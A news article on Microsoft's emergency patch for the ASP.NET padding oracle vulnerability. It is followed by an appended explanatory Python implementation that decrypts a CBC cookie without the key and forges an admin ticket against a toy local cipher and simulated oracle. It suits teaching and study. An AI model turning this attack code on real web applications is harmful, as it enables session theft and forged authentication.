Microsoft on Tuesday will release an emergency out-of-band patch for the ASP.NET padding oracle vulnerability that was disclosed earlier this month. For the time being, however, the patch will be available only from the company's Download Center.
The company is taking the step of releasing an emergency fix because of the seriousness of the vulnerability, which potentially affects millions of Web applications, and because attacks against it are already under way. The patch fixes the flaw in all versions of the .NET Framework.
“Based on our comprehensive monitoring of the threat landscape, we have determined an out-of-band release is needed to protect customers as we have seen limited attacks and continued attempts to bypass current defenses and workarounds,” Microsoft security official Dave Forstrom said in a blog post on the emergency patch.
“The security update is fully tested and ready for release, but will be made available initially only on the Microsoft Download Center. This enables us to get the update out as quickly as possible, allowing administrators with enterprise installations, or end users who want to install this security update manually, the ability to test and update their systems immediately. We strongly encourage these customers to visit the Download Center, download the update, test it in their environment and deploy it as soon as possible.”
Microsoft plans to release the ASP.NET patch through Windows Update and Windows Server Update Services (WSUS) within the next week.
Although Microsoft issued guidance on workarounds shortly after the researchers publicly disclosed the bug, the researchers, Juliano Rizzo and Thai Duong, said that the workarounds did not fully protect users against their attack. A padding oracle attack needs no knowledge of the encryption key: the attacker submits modified ciphertext to the application and observes whether the server reports a padding error, and each such answer leaks a little of the plaintext. The technique lets an attacker decrypt data the Web application encrypted, including stored cookies, and also forge authentication tickets that the target application will accept.
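The attack the article describes, worked through in code. This is an added example, not the researchers' tool or Microsoft's code, and it makes two assumptions that are not on the page: the server's block cipher is replaced by a toy 16-byte Feistel cipher built from HMAC-SHA256 (the attack never looks inside the cipher, so it behaves exactly as it would against AES-CBC), and the oracle is modeled as a function that returns only whether decryption produced valid PKCS#7 padding, which is the one bit an attacker extracts from a server whose error responses can be told apart. The sample cookie, key and forged ticket are constructed for the demonstration.

```python
import hashlib
import hmac
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def split_blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

# Toy 16-byte block cipher: 4-round Feistel with an HMAC-SHA256 round function.
# Assumed stand-in for AES; any CBC-mode block cipher is attacked the same way.
def _round(key, half, rnd):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, l, rnd)), l
    return l + r

# PKCS#7 padding and CBC mode, as a server might use them for cookies or tickets.
def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    prev = os.urandom(BLOCK)                       # random IV, sent in the clear
    out = [prev]
    for chunk in split_blocks(pad(plaintext)):
        prev = block_encrypt(key, xor(chunk, prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, data):
    blocks = split_blocks(data)                    # blocks[0] is the IV
    plain = b"".join(xor(block_decrypt(key, blocks[i]), blocks[i - 1]) for i in range(1, len(blocks)))
    return unpad(plain)

def make_oracle(key):
    """The leak: the server reveals only whether the padding was valid. No plaintext is returned."""
    def oracle(data):
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle

# The attack: recover D_key(block), the cipher's output before the CBC XOR, one byte at a time.
def recover_intermediate(oracle, block):
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos                      # padding value the oracle must accept
        prefix = bytearray(BLOCK)                  # our chosen "previous block"
        for j in range(pos + 1, BLOCK):            # already-known bytes forced to pad_val
            prefix[j] = inter[j] ^ pad_val
        for guess in range(256):
            prefix[pos] = guess
            if not oracle(bytes(prefix) + block):
                continue
            if pos == BLOCK - 1:                   # rule out an accidental 02 02 (or longer) hit
                prefix[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(prefix) + block)
                prefix[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle accepted no value for byte %d" % pos)
    return bytes(inter)

def padding_oracle_decrypt(oracle, data):
    """Decrypt a CBC message (IV || blocks) with no key, using only the oracle."""
    blocks = split_blocks(data)
    plain = b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1]) for i in range(1, len(blocks)))
    return unpad(plain)

def padding_oracle_encrypt(oracle, plaintext):
    """Forge a ciphertext for chosen plaintext (the ticket-forgery direction): start from a
    random last block and work backwards, each earlier block = D_key(next) XOR wanted text."""
    cur = os.urandom(BLOCK)
    out = [cur]
    for chunk in reversed(split_blocks(pad(plaintext))):
        cur = xor(recover_intermediate(oracle, cur), chunk)
        out.append(cur)
    return b"".join(reversed(out))                 # the last block chosen is the IV

if __name__ == "__main__":
    key = os.urandom(BLOCK)                        # the attacker never sees this
    oracle = make_oracle(key)
    cookie = cbc_encrypt(key, b"user=alice;role=member")      # constructed sample cookie
    print(padding_oracle_decrypt(oracle, cookie))
    forged = padding_oracle_encrypt(oracle, b"user=alice;role=admin")
    print(cbc_decrypt(key, forged))
```

The cost is at most 256 oracle queries per byte, so a 32-byte cookie falls in a few thousand requests, and the forgery direction needs the same number per block of forged ticket. Everything the attacker learns comes through the single valid/invalid bit, which is why a workaround that merely hides the specific error message is not enough if the two outcomes remain distinguishable by any other response difference.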